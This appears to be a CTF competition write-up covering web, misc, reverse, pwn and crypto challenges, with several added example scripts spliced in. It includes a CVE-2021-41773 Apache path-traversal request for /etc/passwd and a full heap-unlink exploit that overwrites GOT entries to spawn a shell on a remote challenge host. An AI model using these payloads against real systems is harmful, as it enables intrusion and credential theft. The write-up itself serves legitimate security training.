Qiangwang Cup (强网杯) Youth Cup preliminary round writeup

Team info

Team name: Rml
Team rank: 5

Results

Solutions

web

web1

CVE-2021-41773, the path-traversal bug in Apache HTTP Server 2.4.49: a flaw in path normalization lets ".%2e/" sequences escape an aliased directory such as /cgi-bin/, and with mod_cgi enabled the same bug gives code execution. We just fired the public payload, i.e. a request for /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd. It only works when the traversed files are not covered by a "Require all denied" directory block; the 2.4.50 fix was incomplete (CVE-2021-42013, which needs the double-encoded ".%%32%65/" instead).

misc

misc1

After base64-decoding we get an image, but every pair of bytes has been swapped: the PNG signature 89 50 4E 47 0D 0A 1A 0A shows up as 50 89 47 4E 0A 0D 0A 1A, which is what gives the transform away.

Fix script:

# swap every pair of bytes back; a trailing odd byte is left as it is
with open('a.png', 'rb') as f:
    data = f.read()

with open('b.png', 'wb') as f1:
    for i in range(0, len(data), 2):
        f1.write(data[i:i+2][::-1])

The repaired image gives the hint "the key is music's wealth code" (密钥就是音乐的财富密码); together with the challenge description "do you know what the universal chord progression is?" (你知道万能和弦是什么吗?) that gives 4536251, the IV-V-iii-vi-ii-V-I progression.

Extract the LSB payload with that key to get the flag.

misc2

Reproduced after the contest.

This is the second half of the Xiangyun Cup (祥云杯) challenge shuffle_code.

The rows of the QR matrix were shuffled; only rows 9 to 19 are out of place, the rows holding the finder patterns (0 to 8 and 20 to 28) are intact. Column 6 of a QR code is the timing pattern, which alternates dark/light down the rows, so the column-6 module of each shuffled row tells whether it belongs at an odd or an even row index. That is why the script below permutes the six odd-index rows and the five even-index rows separately (6!*5! = 86,400 candidates instead of 11!, about 40 million) and hands each candidate to pyzbar.
Brute-force script found online:

data = [[1,1,1,1,1,1,1,0,1,0,1,1,0,0,1,1,0,1,0,0,1,0,1,1,1,1,1,1,1],[1,0,0,0,0,0,1,0,1,0,1,0,0,0,1,0,0,0,0,1,1,0,1,0,0,0,0,0,1],[1,0,1,1,1,0,1,0,1,0,1,1,1,1,1,0,0,0,0,1,1,0,1,0,1,1,1,0,1],[1,0,1,1,1,0,1,0,0,1,0,0,1,1,1,0,0,1,1,0,1,0,1,0,1,1,1,0,1],[1,0,1,1,1,0,1,0,1,0,0,0,0,1,0,0,0,0,1,1,0,0,1,0,1,1,1,0,1],[1,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,0,1,0,0,1,0,1,0,0,0,0,0,1],[1,1,1,1,1,1,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,1,1,1,1,1,1],[0,0,0,0,0,0,0,0,0,1,0,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[1,0,0,1,1,1,1,1,1,0,1,0,0,0,0,1,1,1,1,1,1,1,0,0,1,0,1,1,1],[1,1,1,1,0,0,0,0,1,1,0,0,0,0,0,1,1,0,0,0,1,0,1,1,1,1,0,0,1],[1,1,0,0,1,0,1,1,0,0,1,1,1,1,0,1,0,1,0,1,1,0,0,1,1,0,1,0,1],[0,1,1,0,1,0,0,0,0,0,0,0,1,0,0,0,1,0,1,0,0,1,1,0,1,1,1,0,1],[1,1,0,0,1,0,1,1,0,0,0,1,0,1,0,1,0,0,0,1,0,1,1,1,0,1,0,0,1],[1,1,1,0,1,0,0,0,0,1,0,1,1,0,0,1,0,1,0,1,0,0,0,1,1,1,0,0,0],[0,0,0,0,1,0,1,1,0,0,1,0,1,0,1,1,0,1,1,0,1,1,1,0,1,1,0,0,0],[1,1,1,1,1,1,0,1,0,0,0,1,0,1,0,1,0,0,1,0,1,1,0,1,1,1,1,0,1],[0,1,1,1,0,1,1,1,1,0,0,1,0,1,0,0,0,0,1,1,1,0,0,0,0,0,0,0,1],[1,0,0,1,1,0,0,0,1,1,1,0,1,1,0,1,0,1,0,1,1,1,0,0,1,1,1,0,0],[1,0,1,1,1,1,1,1,0,0,1,0,1,0,1,1,1,0,1,1,0,1,1,1,0,0,0,1,1],[1,0,1,1,1,1,0,0,1,1,0,1,1,0,1,0,0,1,1,0,1,1,1,1,1,1,0,1,1],[1,1,1,1,1,0,1,1,0,0,0,0,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1],[0,0,0,0,0,0,0,0,1,0,1,1,0,1,0,1,0,0,0,1,1,0,0,0,1,0,1,0,0],[1,1,1,1,1,1,1,0,1,0,0,1,0,1,0,1,0,1,1,1,1,0,1,0,1,1,0,0,0],[1,0,0,0,0,0,1,0,1,1,1,0,1,0,1,0,1,1,1,0,1,0,0,0,1,0,0,0,0],[1,0,1,1,1,0,1,0,1,0,0,0,1,1,1,0,0,0,1,1,1,1,1,1,1,0,0,1,0],[1,0,1,1,1,0,1,0,1,0,1,1,0,0,1,1,0,1,1,0,1,0,0,1,0,1,1,0,1],[1,0,1,1,1,0,1,0,0,1,0,0,0,1,0,1,0,0,0,0,0,0,0,0,1,0,0,1,1],[1,0,0,0,0,0,1,0,0,0,1,0,0,1,0,0,1,0,0,1,0,1,1,0,1,0,1,0,1],[1,1,1,1,1,1,1,0,1,0,1,0,0,0,0,1,0,0,0,0,1,0,1,1,0,1,0,0,0]]

import pyzbar.pyzbar as pyzbar
from itertools import permutations
from PIL import Image
import matplotlib.pyplot as plt
from tqdm import tqdm

# rows 9..19 are the shuffled ones; the timing column (column 6) says which of
# them belong at odd row indices and which at even row indices
shuffle_1 = [9, 11, 13, 15, 17, 19]
shuffle_2 = [10, 12, 14, 16, 18]
head = data[0:9]     # rows 0..8 are intact
tail = data[20:]     # rows 20..28 are intact

def body(body_1, body_2):
    # interleave: odd-slot row, even-slot row, ..., ending with the sixth odd-slot row
    body = []
    for i in range(5):
        body.append(body_1[i])
        body.append(body_2[i])
    body.append(body_1[5])
    return [data[i] for i in body]

def draw_img(data):
    # 29x29 modules plus a 1-module white border; if the decoder misses it,
    # scale the image up, e.g. img.resize((310, 310), Image.NEAREST)
    assert len(data) == 29 and len(data[0]) == 29
    img = Image.new('RGB', (31, 31), (255, 255, 255))
    for i, row in enumerate(data):
        for j, pixel in enumerate(row):
            img.putpixel((j + 1, i + 1), (0, 0, 0) if pixel == 1 else (255, 255, 255))
    return img

with tqdm(total=720 * 120) as pbar:      # 6! * 5! candidate row orders
    for body_1 in permutations(shuffle_1):
        for body_2 in permutations(shuffle_2):
            im = draw_img(head + body(body_1, body_2) + tail)
            barcodes = pyzbar.decode(im)
            pbar.update(1)
            if len(barcodes) == 0:
                continue
            for barcode in barcodes:
                barcodeData = barcode.data.decode("utf-8")
                print(barcodeData)
            plt.imshow(im)
            plt.show()
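The following is an added example (it is neither part of the writeup nor of the online script): it uses the QR timing pattern to work out which of the scrambled rows belong at odd and which at even row indices, which is the reason the brute force only has to try 6!*5! orders instead of 11!. The 29x29 module matrix is the one from the writeup, written as strings ('1' = dark module); the function names are ours.

```python
from itertools import permutations
from math import factorial

# The writeup's 29x29 matrix, one string per row ('1' = dark).
QR_ROWS = [
    "11111110101100110100101111111",
    "10000010101000100001101000001",
    "10111010101111100001101011101",
    "10111010010011100110101011101",
    "10111010100001000011001011101",
    "10000010001000100100101000001",
    "11111110101010101010101111111",
    "00000000010111000000000000000",
    "10011111101000011111110010111",
    "11110000110000011000101111001",
    "11001011001111010101100110101",
    "01101000000010001010011011101",
    "11001011000101010001011101001",
    "11101000010110010101000111000",
    "00001011001010110110111011000",
    "11111101000101010010110111101",
    "01110111100101000011100000001",
    "10011000111011010101110011100",
    "10111111001010111011011100011",
    "10111100110110100110111111011",
    "11111011000010111111111110101",
    "00000000101101010001100010100",
    "11111110100101010111101011000",
    "10000010111010101110100010000",
    "10111010100011100011111110010",
    "10111010101100110110100101101",
    "10111010010001010000000010011",
    "10000010001001001001011010101",
    "11111110101000010000101101000",
]

N = len(QR_ROWS)                 # 29 modules -> QR version 3
TIMING = 6                       # the timing pattern runs along row 6 and column 6
SHUFFLED = list(range(9, 20))    # rows the challenge scrambled; 0..8 and 20..28 are intact

def timing_bit(index):
    """Expected timing module at (index, 6) or (6, index): dark at 8, then alternating."""
    return 1 if (index - 8) % 2 == 0 else 0

def check_fixed_patterns(rows):
    """Sanity check on the rows we trust: column 6 at rows 8 and 20, and the whole
    timing row 6 (columns 8..N-9), must follow the alternating pattern."""
    for r in [8] + list(range(20, N - 8)):
        if int(rows[r][TIMING]) != timing_bit(r):
            return False
    return all(int(rows[TIMING][c]) == timing_bit(c) for c in range(8, N - 8))

def classify_rows(rows, candidates):
    """Split scrambled rows by their column-6 module: dark means the row belongs
    at an even index (8, 10, ..., 20 are dark), light means an odd index."""
    odd, even = [], []
    for r in candidates:
        (even if rows[r][TIMING] == "1" else odd).append(r)
    return odd, even

def search_space(odd, even):
    """(orders left after the split, orders for a blind permutation of all rows)."""
    return factorial(len(odd)) * factorial(len(even)), factorial(len(odd) + len(even))

def candidate_orders(odd, even):
    """Every full row order consistent with the timing column: odd-slot rows fill
    9, 11, ..., 19 and even-slot rows fill 10, ..., 18 (same layout as body() above)."""
    for po in permutations(odd):
        for pe in permutations(even):
            body = [None] * len(SHUFFLED)
            body[0::2] = po
            body[1::2] = pe
            yield list(range(0, 9)) + body + list(range(20, N))

if __name__ == "__main__":
    assert check_fixed_patterns(QR_ROWS)
    odd, even = classify_rows(QR_ROWS, SHUFFLED)
    print("odd-index rows:", odd, "even-index rows:", even)
    print("orders to try: %d (instead of %d)" % search_space(odd, even))
```

Feeding each order from candidate_orders() to draw_img()/pyzbar gives the same search as the script above; the point is that the split into shuffle_1 and shuffle_2 is derived from the matrix rather than guessed.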

misc3

binwalk carves a zip archive out of the file.

It is LSB extraction again; the password is at the end of the image: 7his_1s_p4s5w0rd
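Both misc1 and misc3 end with "LSB extraction with a password". The block below is an added example, not the tool used in the writeup: a minimal LSB embed/extract over raw RGB bytes, to show what the LSB plane of a carrier actually holds. The real challenges used a password-protected LSB tool on an image file; this demo has no encryption and assumes our own conventions (one payload bit per byte in sequential order, MSB-first within each payload byte, and a 4-byte big-endian length header). The carrier and the payload are constructed inline.

```python
import struct

def lsb_embed(cover: bytes, payload: bytes) -> bytes:
    """Write len(payload) (4 bytes, big-endian) + payload into the LSBs of successive cover bytes."""
    frame = struct.pack(">I", len(payload)) + payload
    nbits = len(frame) * 8
    if nbits > len(cover):
        raise ValueError(f"cover holds {len(cover) // 8} bytes, payload frame needs {len(frame)}")
    stego = bytearray(cover)
    for k in range(nbits):
        bit = (frame[k // 8] >> (7 - k % 8)) & 1      # MSB-first within each frame byte
        stego[k] = (stego[k] & 0xFE) | bit            # only the lowest bit of the carrier changes
    return bytes(stego)

def lsb_extract(stego: bytes) -> bytes:
    """Read the LSB plane back; the first 32 bits are the payload length."""
    def read_bytes(offset_bits, count):
        out = bytearray()
        for i in range(count):
            v = 0
            for j in range(8):
                v = (v << 1) | (stego[offset_bits + i * 8 + j] & 1)
            out.append(v)
        return bytes(out)
    (length,) = struct.unpack(">I", read_bytes(0, 4))
    if 32 + length * 8 > len(stego):
        # a carrier with no payload yields a garbage length; refuse instead of reading past the end
        raise ValueError("length header exceeds carrier size (no LSB payload in this format?)")
    return read_bytes(32, length)

def bytes_changed(cover: bytes, stego: bytes) -> int:
    """How many carrier bytes the embedding touched (each by exactly one bit)."""
    return sum(1 for a, b in zip(cover, stego) if a != b)

# Constructed carrier: a 64x64 RGB "image" as a flat byte string (12288 bytes,
# so room for 1536 payload bytes). The payload is constructed as well.
COVER = bytes((x * 7 + 13) & 0xFF for x in range(64 * 64 * 3))
PAYLOAD = b"constructed LSB payload: key=4536251"

if __name__ == "__main__":
    stego = lsb_embed(COVER, PAYLOAD)
    print(lsb_extract(stego))
    print(bytes_changed(COVER, stego), "of", len(COVER), "carrier bytes changed")
```

Real tools differ in bit order, channel order and whether the payload is encrypted with the password first, which is why a generic extractor only produces noise on a carrier written by a different tool; the length check above is what turns that noise into an error instead of a silent garbage result.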

reverse

re2

The full map was recovered by dynamic debugging in gdb: eight layers of 8x8 cells (0 = open cell, 1 = wall, as read from the start position).

Layer 0
0 1 1 1 1 1 1 1
0 0 0 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1

Layer 1
1 1 1 1 1 1 1 1
1 1 0 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1

Layer 2
1 1 1 1 1 1 1 1
1 1 0 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 0 1 1
1 1 1 1 1 0 1 1
1 1 1 1 1 0 1 1
1 1 1 1 1 1 1 1

Layer 3
1 1 1 1 1 1 1 1
1 1 0 0 1 1 1 1
1 1 1 0 1 1 1 1
1 1 1 0 1 1 1 1
1 1 1 0 1 0 1 1
1 1 1 0 1 1 1 1
1 1 1 0 0 0 1 1
1 1 1 1 1 1 1 1

Layer 4
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 0 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1

Layer 5
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 0 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1

Layer 6
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 0 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 0 0 0
1 1 1 1 1 1 1 0

Layer 7
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 0 1 1
1 1 1 1 1 0 1 1
1 1 1 1 1 0 1 1
1 1 1 1 1 1 1 0

511 = 64*7 + 63, so the program wants us to walk from cell 0 of layer 0 (row 0, column 0) to cell 63 of layer 7 (row 7, column 7); the cell index is layer*64 + row*8 + column.

Moves: a = down (row + 1), b = up, l = left, r = right, u = next layer, d = previous layer.

input: arruuuraaaaarrdbbuuuuuaadrrau

flag: flag{6c2a5b75-232d-26ea-c3cc-8f7a924d7357}
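An added example (not from the writeup): a BFS solver for the 3-D maze above, so the 29-move input does not have to be traced by hand. The eight 8x8 layers and the move letters are copied from the writeup; that 0 marks an open cell and 1 a wall, and that the cell index is layer*64 + row*8 + col (which makes the goal 511), is our reading of it. Function names are ours.

```python
from collections import deque

# The eight layers from the writeup, row strings top to bottom ('0' = open, '1' = wall).
LAYERS = [
    ["01111111", "00011111", "11111111", "11111111", "11111111", "11111111", "11111111", "11111111"],
    ["11111111", "11011111", "11111111", "11111111", "11111111", "11111111", "11111111", "11111111"],
    ["11111111", "11011111", "11111111", "11111111", "11111011", "11111011", "11111011", "11111111"],
    ["11111111", "11001111", "11101111", "11101111", "11101011", "11101111", "11100011", "11111111"],
    ["11111111", "11111111", "11111111", "11111111", "11111011", "11111111", "11111111", "11111111"],
    ["11111111", "11111111", "11111111", "11111111", "11111011", "11111111", "11111111", "11111111"],
    ["11111111", "11111111", "11111111", "11111111", "11111011", "11111111", "11111000", "11111110"],
    ["11111111", "11111111", "11111111", "11111111", "11111011", "11111011", "11111011", "11111110"],
]

# move letter -> (layer, row, col) delta, as described in the writeup
MOVES = {"a": (0, 1, 0), "b": (0, -1, 0), "l": (0, 0, -1), "r": (0, 0, 1),
         "u": (1, 0, 0), "d": (-1, 0, 0)}
START, GOAL = (0, 0, 0), (7, 7, 7)
WRITEUP_INPUT = "arruuuraaaaarrdbbuuuuuaadrrau"

def cell_index(layer, row, col):
    return layer * 64 + row * 8 + col

def is_open(pos):
    z, y, x = pos
    return 0 <= z < 8 and 0 <= y < 8 and 0 <= x < 8 and LAYERS[z][y][x] == "0"

def step(pos, move):
    dz, dy, dx = MOVES[move]
    return (pos[0] + dz, pos[1] + dy, pos[2] + dx)

def walk(moves, start=START):
    """Replay a move string; returns the final position, or None if it hits a wall or the edge."""
    pos = start
    for m in moves:
        pos = step(pos, m)
        if not is_open(pos):
            return None
    return pos

def solve(start=START, goal=GOAL):
    """Shortest move string from start to goal (breadth-first search), or None if unreachable."""
    prev = {start: None}
    queue = deque([start])
    while queue:
        pos = queue.popleft()
        if pos == goal:
            path = []
            while prev[pos] is not None:
                pos, m = prev[pos]
                path.append(m)
            return "".join(reversed(path))
        for m in MOVES:
            nxt = step(pos, m)
            if is_open(nxt) and nxt not in prev:
                prev[nxt] = (pos, m)
                queue.append(nxt)
    return None

if __name__ == "__main__":
    end = walk(WRITEUP_INPUT)
    print("writeup input ends at", end, "= cell", cell_index(*end))
    print("BFS path:", solve())
```

The same solver works for any map dumped from the binary; only LAYERS, the move table and the start/goal cells change.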

pwn

pwn2

The bug is an off-by-null when a chunk is created: filling chunk 3 writes a null byte into the low byte of chunk 4's size field, clearing its prev_inuse bit (and the last qword of chunk 3 becomes chunk 4's prev_size), so freeing chunk 4 consolidates backwards and runs unlink on the fake chunk we built inside chunk 3.

Unlink lets us write the address of chunk_list into chunk_list itself, which gives arbitrary read/write through the edit/show functions. For the unlink check to pass before the merge, chunk3->fd->bk and chunk3->bk->fd must both point at chunk 3, so chunk3->fd and chunk3->bk are set to addresses inside chunk_list (chunk_list[3] - 0x18 and chunk_list[3] - 0x10); after unlink, chunk_list[3] = &chunk_list[3] - 0x18 = &chunk_list[0].

Then, because the program passes the chunk pointer as the first argument to both strlen and free, we overwrite free's GOT entry with puts's PLT stub to print a freed chunk's fd field (a pointer into main_arena) and compute the libc base from it, and finally overwrite strlen's GOT entry with system, so the next strlen on a chunk holding "/bin/sh" executes system("/bin/sh").

from pwn import *
# from LibcSearcher import *    # not needed, the libc build is known (libc-2.23.so)
# context.log_level = 'debug'

def add(ind, size, data):
    p.sendlineafter('>', '1')
    p.sendlineafter('(0~9):', str(ind))
    p.sendlineafter('(1 ~ 1024):', str(size))
    p.sendafter('Content:', data)

def show(ind):
    p.sendlineafter('>', '2')
    p.sendlineafter('(0~9):', str(ind))

def free(ind):
    p.sendlineafter('>', '3')
    p.sendlineafter('(0~9):', str(ind))

def edit(ind, data):
    p.sendlineafter('>', '4')
    p.sendlineafter('(0~9):', str(ind))
    p.sendafter('Content:', data)

p = remote('101.200.76.17', '24195')
# p = process('./b64heap')
# gdb.attach(p)
e = ELF('./b64heap', checksec=0)
libc = ELF('./libc-2.23.so', checksec=0)
free_got = e.got['free']
strlen_got = e.got['strlen']
puts_plt = e.plt['puts']
chunk_list = 0x6020c0          # global table of chunk pointers, 8 bytes per slot
heap_list = chunk_list

add(0, 0x10, "/bin/sh\x00")
add(1, 0x10, " ")
add(2, 0x10, " ")
add(3, 0x90, " ")
add(4, 0xf0, " ")
add(5, 0x30, " ")
add(6, 0x30, '/bin/sh\x00')
free(3)
# fake chunk inside chunk 3: fd->bk and bk->fd both resolve to chunk_list[3]
fd = heap_list + 0x8*3 - 0x18
bk = heap_list + 0x8*3 - 0x10
# re-allocate chunk 3 with 0x98 bytes: the off-by-null lands on chunk 4's size byte
# (clearing PREV_INUSE) and the trailing p64(0x90) becomes chunk 4's prev_size
add(3, 0x98, p64(0) + p64(0x91) + p64(fd) + p64(bk) + b'a'*0x70 + p64(0x90))
free(4)                           # backward consolidation -> unlink -> chunk_list[3] = &chunk_list[0]
# free(3)
edit(3, b'a'*8)
show(3)                           # chunk 3 now reads chunk_list itself (sanity check)
edit(3, p64(heap_list + 0x8*5))   # chunk_list[0] -> &chunk_list[5]
edit(0, p64(heap_list + 0x8))     # chunk_list[5] -> &chunk_list[1]
edit(3, p64(free_got))            # chunk_list[0] -> free@got
edit(5, p8(0x80))                 # low byte of chunk_list[1]: retarget it at a freed chunk's fd
edit(0, p64(puts_plt))            # free@got = puts@plt
free(1)                           # free(chunk_list[1]) is now puts(...) -> leaks a main_arena pointer
d = u64(p.read(6).ljust(8, b'\x00'))
print(hex(d))
# unsorted-bin fd = main_arena + 0x58 on glibc 2.23 x86-64; __malloc_hook sits 0x10 before main_arena
malloc_hook = d - 0x58 - 0x10

system = malloc_hook - libc.sym['__malloc_hook'] + libc.sym['system']
print(hex(strlen_got))
print(hex(system))
edit(3, p64(strlen_got))          # chunk_list[0] -> strlen@got
edit(0, p64(system))              # strlen@got = system
# the strlen call inside edit now runs system on the chunk contents
edit(6, 'cat flag\n')

p.interactive()
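To make the unlink step concrete, here is an added example (not the challenge binary and not the writeup's exploit): a stand-alone simulation of the glibc 2.23 unlink that the exploit abuses. A fake chunk is forged inside chunk 3's user data with fd/bk pointing into a global table of chunk pointers (standing in for the binary's chunk_list at 0x6020c0); after unlink, chunk_list[3] points back into chunk_list itself. All names are ours, and the 8-bytes-per-slot table layout is an assumption about the binary.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

struct chunk {              /* the malloc_chunk fields that unlink touches */
    size_t prev_size;
    size_t size;
    struct chunk *fd;       /* offset 0x10 */
    struct chunk *bk;       /* offset 0x18 */
};

#define NSLOTS 10
static struct chunk *chunk_list[NSLOTS];                   /* assumed: one 8-byte pointer per slot */
static union { struct chunk c; char raw[0x90]; } chunk3;   /* stands in for chunk 3's user data */

/* unlink as in glibc 2.23: the only integrity check is fd->bk == P && bk->fd == P
 * ("corrupted double-linked list"); later glibc versions add size/prev_size checks. */
static int unlink_2_23(struct chunk *p)
{
    struct chunk *fd = p->fd, *bk = p->bk;
    if (fd->bk != p || bk->fd != p)
        return 0;
    fd->bk = bk;     /* writes chunk_list[idx] = bk ... */
    bk->fd = fd;     /* ... then chunk_list[idx] = fd, which is the value that sticks */
    return 1;
}

/* Forge the fake chunk the way the writeup's payload does for table slot idx:
 * fd = &chunk_list[idx] - 0x18, so fd->bk (offset 0x18) *is* chunk_list[idx];
 * bk = &chunk_list[idx] - 0x10, so bk->fd (offset 0x10) *is* chunk_list[idx].
 * Both equal the fake chunk because chunk_list[idx] points at it. */
void forge_fake_chunk(struct chunk *fake, int idx, ptrdiff_t fd_off, ptrdiff_t bk_off)
{
    fake->prev_size = 0;
    fake->size = 0x91;      /* 0x90 | PREV_INUSE, matching the payload */
    fake->fd = (struct chunk *)((char *)&chunk_list[idx] + fd_off);
    fake->bk = (struct chunk *)((char *)&chunk_list[idx] + bk_off);
}

/* The off-by-null: the terminating zero lands on the low byte of the next chunk's
 * size field, clearing PREV_INUSE (0x101 -> 0x100); free() then consolidates
 * backwards using the attacker-supplied prev_size. */
size_t off_by_null(size_t size_field)
{
    return size_field & ~(size_t)0xff;
}

/* Run the unlink against slot idx; returns what chunk_list[idx] holds afterwards,
 * or NULL if the 2.23 check rejected the fake chunk. */
void *unlink_demo(int idx, ptrdiff_t fd_off, ptrdiff_t bk_off)
{
    chunk_list[idx] = &chunk3.c;                          /* slot idx -> chunk 3's data */
    forge_fake_chunk(&chunk3.c, idx, fd_off, bk_off);
    if (!unlink_2_23(&chunk3.c))
        return NULL;
    return chunk_list[idx];
}

int main(void)
{
    void *after = unlink_demo(3, -0x18, -0x10);
    printf("chunk_list[3] = %p, &chunk_list[0] = %p\n", after, (void *)&chunk_list[0]);
    printf("chunk 4 size field 0x101 -> 0x%zx after the off-by-null\n", off_by_null(0x101));
    printf("wrong fd (-0x20): %s\n", unlink_demo(4, -0x20, -0x10) ? "accepted" : "rejected");
    return after == (void *)&chunk_list[0] ? 0 : 1;
}
```

The second call shows the caveat: with fd off by one slot, fd->bk no longer resolves to the fake chunk and glibc aborts with "corrupted double-linked list", so the fd/bk offsets have to match the table slot that holds the chunk being consolidated, not just any slot.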

crypto

crypto1

The ciphertext contains only A, B and spaces, so it is clearly Morse code.
Replace A with '-', B with '.' and spaces with '/'.

Decoding script:

class morse:
    def __init__(self):
        self.codedict = {'.-': "a",
                         '-...': "b",
                         '-.-.': "c",
                         '-..': "d",
                         '.': "e",
                         '..-.': "f",
                         '--.': "g",
                         '....': "h",
                         '..': "i",
                         '.---': "j",
                         '-.-': "k",
                         '.-..': "l",
                         '--': "m",
                         '-.': "n",
                         '---': "o",
                         '.--.': "p",
                         '--.-': "q",
                         '.-.': "r",
                         '...': "s",
                         '-': "t",
                         '..-': "u",
                         '...-': "v",
                         '.--': "w",
                         '-..-': "x",
                         '-.--': "y",
                         '--..': "z",
                         '.----': "1",
                         '..---': "2",
                         '...--': "3",
                         '....-': "4",
                         '.....': "5",
                         '-....': "6",
                         '--...': "7",
                         '---..': "8",
                         '----.': "9",
                         '-----': "0",
                         '..--..': "?",
                         '-..-.': "/",
                         '-.--.': "(",
                         '-.--.-': ")",
                         '-....-': "-",
                         '.-.-.-': ".",
                         '--..--': ',',
                         '-.-.-.': ';',
                         '.----.': '\''}

    def GetPlain(self, text):
        # letters are separated by '/'; skip empty tokens (e.g. a trailing separator)
        textlist = text.split('/')
        detext = ''
        for i in textlist:
            if i:
                detext += self.codedict[i]
        return detext

    def DeBlast(self, text, detext):
        # no separator available: enumerate every valid segmentation
        for i in self.codedict.keys():
            if text.find(i) == 0:
                if (len(text) - len(i)) == 0:
                    self.delist.append(detext + self.codedict[i])
                    continue
                self.DeBlast(text[len(i):], detext + self.codedict[i])

    def decode(self, text, seg='/', point='.', hor='-', blast=0, out=1):
        """
        key[0] == '.'
        key[1] == '-'
        key[2] == '/'
        """
        key = [point, hor, seg]
        div = ['.', '-', '/']
        # map the caller's symbols onto '.', '-', '/' before either decode path
        for i in range(3):
            text = text.replace(key[i], div[i])
        if blast == 0:
            self.detext = self.GetPlain(text)
            if out:
                print(self.detext)
            return self.detext
        else:
            self.delist = []
            self.DeBlast(text, '')
            if out:
                for i in self.delist:
                    print(i)
            return self.delist

m = morse()
f = open('classicCrypto.txt')    # one Morse word per line, already converted to . - /
d = f.read().splitlines()
e = ''
for i in d:
    e = e + m.decode(i) + ' '
print(e)

The Morse output is still a monoalphabetic substitution cipher; cracking it with https://quipqiup.com/ gives:

cryptography is the practice and study of techniques for secure communication in the presence of adversarial behavior, which is divided into classical cryptography and modern cryptography. the main classical cipher types are transposition ciphers, which rearrange the order of letters in a message. an early substitution cipher was the caesar cipher, in which each letter in the plaintext was replaced by a letter some fixed number of positions further down the alphabet. since the development of rotor cipher machines in world war i and the advent of computers in world war ii, cryptography methods have become increasingly complex and its applications more varied. modern cryptography is heavily based on mathematical theory and computer science practice; cryptographic algorithms are designed around computational hardness assumptions. the growth of cryptographic technology has raised a number of legal issues in the information age. cryptography's potential for use as a tool for espionage and sedition has led many governments to classify it as a weapon and to limit or even prohibit its use and export. in some jurisdictions where the use of cryptography is legal, laws permit investigators to compel the disclosure of encryption keys for documents relevant to an investigation. cryptography also plays a major role in digital rights management and copyright infringement disputes in regard to digital media.the flag is 1d817f23-4e20-9405-bf6d-e83d055316d6, please add flag string and braces yourself, and all letters are lowercase.

Flag: 1d817f23-4e20-9405-bf6d-e83d055316d6

crypto2

After a rail-fence rearrangement, the string given by the challenge looks close to the flag format.

Matching the flag format shows the whole string needs XOR 32 ('F'^32 = 'f', '['^32 = '{'). The description says the flag is a UUID, so the lowercase 'l' must become '-': 'l'^32 = 'L' = 0x4c and '-' = 0x2d = 0x4c - 31, so the characters that were lowercase additionally need 31 subtracted after the XOR.

Solve script:

a = "FvLFArGp[ovpxBpsssD]qCElwwoClsoColwpuvlqFv"   # string given by the challenge
b = "FLAG[vxpsDqCElwwoClsoColwpuvlqFvvFrpopBss]"   # a after the rail-fence rearrangement
e = ''
for i in b:
    if i.islower():
        e = e + chr((ord(i) ^ 32) - 31)   # lowercase: XOR 32, then subtract 31 (so 'l' -> '-')
    else:
        e = e + chr(ord(i) ^ 32)          # everything else: just XOR 32
print(e)


Original post: https://www.dr0n.top/posts/2ef8c529/
Author: dr0n
Published: 2022-09-10
Updated: 2024-03-22